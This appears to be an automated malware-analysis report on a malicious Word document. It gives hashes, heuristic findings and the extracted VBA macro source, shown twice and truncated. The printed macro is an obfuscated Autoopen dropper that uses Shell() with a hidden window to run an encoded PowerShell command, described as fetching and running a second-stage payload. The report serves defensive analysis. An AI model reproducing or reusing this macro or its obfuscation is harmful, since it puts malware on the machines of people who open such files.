Office (OLE) malware analysis — malicious · 1fc5e29f2cbbe3f0

MALICIOUS

Office (OLE)

113.8 KB Created: 2018-05-25 05:28:00 Authoring application: Microsoft Office Word First seen: 2018-06-14

MD5: c8c7ea0cce66bbebf0753e5d9cdb7122 SHA-1: 699f89be3d7fd540584a6b252132ce0dd16d116d SHA-256: 1fc5e29f2cbbe3f07bc9abff8b4e9e6ccf957775f8a18bad3b481eb965e7e198

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an Autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes the Shell() function to execute a PowerShell command, which is obfuscated but appears to be designed to download and execute a second-stage payload. The presence of the Autoopen macro and the Shell() call strongly indicate malicious intent.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18492 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18492 bytes
SHA-256: `c96b575f11413239500c1763306c19ffdad8ab6ab3f8da4c58474540dbdb5f07`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DCjhlAPIj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function UupQYu() On Error Resume Next UCKfw = wiKfo - Cos(CAhtPS) * 1 - Chr(34255) / 87496 - ChrB(wUvLEW) AFUoRz = 71210 KIkwrb = OXVvlj - Cos(XIWci) * 1 - Chr(41754) / 64749 - ChrB(UuwFi) LAhDP = 10698 UupQYu = wfBqnJuLK + mRQrQsArJ + RbzjifPS + PAvzAWKntG + SpCiotwiji + wGpwvTIVKj + CFuhWRkfMz + vAdwuRMrm + NssChwwq + ITWRzj + zzoZom + oowQlNEn GhVCDG = YpJlL - Cos(hLSpQP) * 1 - Chr(89158) / 92415 - ChrB(qzmzmD) nrVaj = 31570 End Function Sub Autoopen() On Error Resume Next AafObq = kNtuXA - Cos(snALnS) * 1 - Chr(83352) / 45484 - ChrB(GUCAB) PkDRk = 34079 tIcKFiuKC (UupQYu) lASFJ = jsDPC - Cos(vEVPtz) * 1 - Chr(68625) / 56397 - ChrB(YuZpc) wJqGQ = 30107 End Sub Function tIcKFiuKC(cDmathn) On Error Resume Next BzshIl = XDEAKG - Cos(uUKTA) * 1 - Chr(77682) / 9633 - ChrB(FtQhm) iMJlaS = 5449 WLozp = UpYfVG - Cos(ojmQb) * 1 - Chr(46175) / 79128 - ChrB(zRbzCo) vOjnKY = 95584 WhcWnZMKTk = Shell(krQtBTGaDq + Chr(vbKeyP) + BQXvhfbH + cDmathn, vbHide) iCwRrQ = kLfht - Cos(WVzuNb) * 1 - Chr(45179) / 88282 - ChrB(wmwdt) vhwfr = 63916 End Function Attribute VB_Name = "OcGzdfjP" Function wfBqnJuLK() On Error Resume Next JzKbc = vlFZLL - Cos(llMlo) * 1 - Chr(72691) / 60385 - ChrB(kivbnH) aIQfB = 45824 mLjQGvQ = "owersHeLL -Wi" + "nDowsTyle hid" + "den -e KAA" + "oACIAewA1AH0Aew" + "AxADUANgB9AH" + "sAMQAwADQAfQB7A" zrkrM = ImMqT - Cos(wXwLB) * 1 - Chr(32140) / 76539 - ChrB(YPOAp) WLwJfJ = 78822 JIaYSZrMp = "DYAMgB9AHsA" + "NQA2AH0AewAzAD" + "kAfQB7" + "ADcAMQB9" + "AHsANwA" + "wAH0A" + "ewAwAH0AewAxADM" oUAzZ = hwVFI - Cos(LBbzO) * 1 - Chr(28523) / 27267 - ChrB(BhdkCh) wqDLJi = 70847 voYfF = "ANwB9AHsA" + "NAA0AH0AewA4ADQ" + "AfQB7ADgA" + "NQB9AHsA" + "NgB9AHsAMQAx" + "ADMAfQB7ADE" + "AMAAxAH0" + "AewA0ADYAfQB7A" dLErSq = tJrZTV - Cos(zuQvpK) * 1 - Chr(12764) / 83865 - ChrB(usikH) uwhaS = 95992 fRQWT = "DcAfQB7ADM" + "AfQB7ADEAN" + "QA1AH0Ae" + "wAyADYAfQ" KXwIbo = sdNRM - Cos(IuNtac) * 1 - Chr(73316) / 91232 - ChrB(zjGSb) tstDm = 25385 NHZFfwsi = "B7ADUAM" + "QB9AH" + "sAMQA1ADQAfQB7" + "ADMAMAB9" tzjjSX = RiRYQ - Cos(zlnzp) * 1 - Chr(22683) / 81989 - ChrB(YMCIN) zlTNa = 57645 lTZiaDlQ = "AHsAOAA4AH0Aew" + "A3ADgA" + "fQB7AD" + "EAMAA3AH0Ae" + "wA5ADAAfQB7" BOMqK = YsURi - Cos(QPIEt) * 1 - Chr(26292) / 50590 - ChrB(jUmia) TXjKE = 95742 pJOPDrrD = "ADkANwB9AHsAM" + "QAwADMAfQB7" + "ADEAM" + "wA5AH0" + "AewAyADIAfQB" + "7ADgA" + "MAB9AHsAMQAyADQ" + "AfQB7ADEAMgA5A" + "H0AewAx" lwWbJf = SHDvUG - Cos(orjZzA) * 1 - Chr(14255) / 77944 - ChrB(biQEuA) JNkPi = 33139 UziJLUwvpS = "ADAAMAB9AH" + "sANAAyAH0AewAz" + "ADMAfQB7A" + "DMANAB9AHsAOA" ckhcEb = rJUJi - Cos(zlEzfz) * 1 - Chr(35184) / 90088 - ChrB(tbCRvu) jqRXGE = 79350 hGmqTios = "AxAH0AewA" + "1ADAAfQB7ADEA" + "MQA4AH0AewA5A" + "DEAfQB7ADEANAA5" + "AH0AewA" + "4ADYAfQB7" wfBqnJuLK = mLjQGvQ + JIaYSZrMp + voYfF + fRQWT + NHZFfwsi + lTZiaDlQ + pJOPDrrD + UziJLUwvpS + hGmqTios End Function Function mRQrQsArJ() On Error Resume Next XDMOk = vvQUN - Cos(Imkhw) * 1 - Chr(81766) / 69691 - ChrB(GamjXI) drHZv = 91960 ZwQrQRwCIUd = "ADEAN" + "AA4AH0A" + "ewAxADQ" + "ANgB9AH" + "sAMQA2A" abkDKT = fmwiVZ - Cos(GjYPTz) * 1 - Chr(21629) / 94103 - ChrB(jrcwS) IvScW = 23436 FAjXZvqNQtU = "H0AewAyAH0A" + "ewAxADAAN" + "QB9AHsANgA2AH0" + "AewAxADQAMwB" + "9AHsAMQA0A" + "DQAfQB7A" + "DEAMAAy" + "AH0Aew" + "AxADkAfQB7" zvjQu = nqzBjc - Cos(IiKbw) * 1 - Chr(52005) / 56832 - ChrB(DLiUf) dBQsDl = 95141 wIpSfijpZcR = "ADkAfQB7A" + "DUANwB9AHsAM" + "QAxADcAf" + "QB7ADEANA" cjDDjJ = ipsWu - Cos(Zkqivi) * 1 - Chr(94226) / 86749 - ChrB(wvPzKo) JfrZVG = 51693 dzmFivuq = "A3AH0Ae" + "wAxADUAMAB9AHsA" + "NAAxAH0AewA" + "xADUAMQB9" + "AHsAN" + "AA3AH0A" + "ewAxA" urUlV = pwkjD - Cos(ZOHCA) * 1 - Chr(87517) / 86652 - ChrB(HokwlB) NiUaTJ = 36052 BIMfXXMLBE = "DIAM ... (truncated)

SHA-256: c96b575f11413239500c1763306c19ffdad8ab6ab3f8da4c58474540dbdb5f07

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DCjhlAPIj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UupQYu()
On Error Resume Next
UCKfw = wiKfo - Cos(CAhtPS) * 1 - Chr(34255) / 87496 - ChrB(wUvLEW)
AFUoRz = 71210
KIkwrb = OXVvlj - Cos(XIWci) * 1 - Chr(41754) / 64749 - ChrB(UuwFi)
LAhDP = 10698
UupQYu = wfBqnJuLK + mRQrQsArJ + RbzjifPS + PAvzAWKntG + SpCiotwiji + wGpwvTIVKj + CFuhWRkfMz + vAdwuRMrm + NssChwwq + ITWRzj + zzoZom + oowQlNEn
GhVCDG = YpJlL - Cos(hLSpQP) * 1 - Chr(89158) / 92415 - ChrB(qzmzmD)
nrVaj = 31570
End Function
Sub Autoopen()
On Error Resume Next
AafObq = kNtuXA - Cos(snALnS) * 1 - Chr(83352) / 45484 - ChrB(GUCAB)
PkDRk = 34079
tIcKFiuKC (UupQYu)
lASFJ = jsDPC - Cos(vEVPtz) * 1 - Chr(68625) / 56397 - ChrB(YuZpc)
wJqGQ = 30107
End Sub
Function tIcKFiuKC(cDmathn)
On Error Resume Next
BzshIl = XDEAKG - Cos(uUKTA) * 1 - Chr(77682) / 9633 - ChrB(FtQhm)
iMJlaS = 5449
WLozp = UpYfVG - Cos(ojmQb) * 1 - Chr(46175) / 79128 - ChrB(zRbzCo)
vOjnKY = 95584
WhcWnZMKTk = Shell(krQtBTGaDq + Chr(vbKeyP) + BQXvhfbH + cDmathn, vbHide)
iCwRrQ = kLfht - Cos(WVzuNb) * 1 - Chr(45179) / 88282 - ChrB(wmwdt)
vhwfr = 63916
End Function


Attribute VB_Name = "OcGzdfjP"
Function wfBqnJuLK()
On Error Resume Next
JzKbc = vlFZLL - Cos(llMlo) * 1 - Chr(72691) / 60385 - ChrB(kivbnH)
aIQfB = 45824
mLjQGvQ = "owersHeLL -Wi" + "nDowsTyle hid" + "den -e KAA" + "oACIAewA1AH0Aew" + "AxADUANgB9AH" + "sAMQAwADQAfQB7A"
zrkrM = ImMqT - Cos(wXwLB) * 1 - Chr(32140) / 76539 - ChrB(YPOAp)
WLwJfJ = 78822
JIaYSZrMp = "DYAMgB9AHsA" + "NQA2AH0AewAzAD" + "kAfQB7" + "ADcAMQB9" + "AHsANwA" + "wAH0A" + "ewAwAH0AewAxADM"
oUAzZ = hwVFI - Cos(LBbzO) * 1 - Chr(28523) / 27267 - ChrB(BhdkCh)
wqDLJi = 70847
voYfF = "ANwB9AHsA" + "NAA0AH0AewA4ADQ" + "AfQB7ADgA" + "NQB9AHsA" + "NgB9AHsAMQAx" + "ADMAfQB7ADE" + "AMAAxAH0" + "AewA0ADYAfQB7A"
dLErSq = tJrZTV - Cos(zuQvpK) * 1 - Chr(12764) / 83865 - ChrB(usikH)
uwhaS = 95992
fRQWT = "DcAfQB7ADM" + "AfQB7ADEAN" + "QA1AH0Ae" + "wAyADYAfQ"
KXwIbo = sdNRM - Cos(IuNtac) * 1 - Chr(73316) / 91232 - ChrB(zjGSb)
tstDm = 25385
NHZFfwsi = "B7ADUAM" + "QB9AH" + "sAMQA1ADQAfQB7" + "ADMAMAB9"
tzjjSX = RiRYQ - Cos(zlnzp) * 1 - Chr(22683) / 81989 - ChrB(YMCIN)
zlTNa = 57645
lTZiaDlQ = "AHsAOAA4AH0Aew" + "A3ADgA" + "fQB7AD" + "EAMAA3AH0Ae" + "wA5ADAAfQB7"
BOMqK = YsURi - Cos(QPIEt) * 1 - Chr(26292) / 50590 - ChrB(jUmia)
TXjKE = 95742
pJOPDrrD = "ADkANwB9AHsAM" + "QAwADMAfQB7" + "ADEAM" + "wA5AH0" + "AewAyADIAfQB" + "7ADgA" + "MAB9AHsAMQAyADQ" + "AfQB7ADEAMgA5A" + "H0AewAx"
lwWbJf = SHDvUG - Cos(orjZzA) * 1 - Chr(14255) / 77944 - ChrB(biQEuA)
JNkPi = 33139
UziJLUwvpS = "ADAAMAB9AH" + "sANAAyAH0AewAz" + "ADMAfQB7A" + "DMANAB9AHsAOA"
ckhcEb = rJUJi - Cos(zlEzfz) * 1 - Chr(35184) / 90088 - ChrB(tbCRvu)
jqRXGE = 79350
hGmqTios = "AxAH0AewA" + "1ADAAfQB7ADEA" + "MQA4AH0AewA5A" + "DEAfQB7ADEANAA5" + "AH0AewA" + "4ADYAfQB7"
wfBqnJuLK = mLjQGvQ + JIaYSZrMp + voYfF + fRQWT + NHZFfwsi + lTZiaDlQ + pJOPDrrD + UziJLUwvpS + hGmqTios
End Function
Function mRQrQsArJ()
On Error Resume Next
XDMOk = vvQUN - Cos(Imkhw) * 1 - Chr(81766) / 69691 - ChrB(GamjXI)
drHZv = 91960
ZwQrQRwCIUd = "ADEAN" + "AA4AH0A" + "ewAxADQ" + "ANgB9AH" + "sAMQA2A"
abkDKT = fmwiVZ - Cos(GjYPTz) * 1 - Chr(21629) / 94103 - ChrB(jrcwS)
IvScW = 23436
FAjXZvqNQtU = "H0AewAyAH0A" + "ewAxADAAN" + "QB9AHsANgA2AH0" + "AewAxADQAMwB" + "9AHsAMQA0A" + "DQAfQB7A" + "DEAMAAy" + "AH0Aew" + "AxADkAfQB7"
zvjQu = nqzBjc - Cos(IiKbw) * 1 - Chr(52005) / 56832 - ChrB(DLiUf)
dBQsDl = 95141
wIpSfijpZcR = "ADkAfQB7A" + "DUANwB9AHsAM" + "QAxADcAf" + "QB7ADEANA"
cjDDjJ = ipsWu - Cos(Zkqivi) * 1 - Chr(94226) / 86749 - ChrB(wvPzKo)
JfrZVG = 51693
dzmFivuq = "A3AH0Ae" + "wAxADUAMAB9AHsA" + "NAAxAH0AewA" + "xADUAMQB9" + "AHsAN" + "AA3AH0A" + "ewAxA"
urUlV = pwkjD - Cos(ZOHCA) * 1 - Chr(87517) / 86652 - ChrB(HokwlB)
NiUaTJ = 36052
BIMfXXMLBE = "DIAM
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.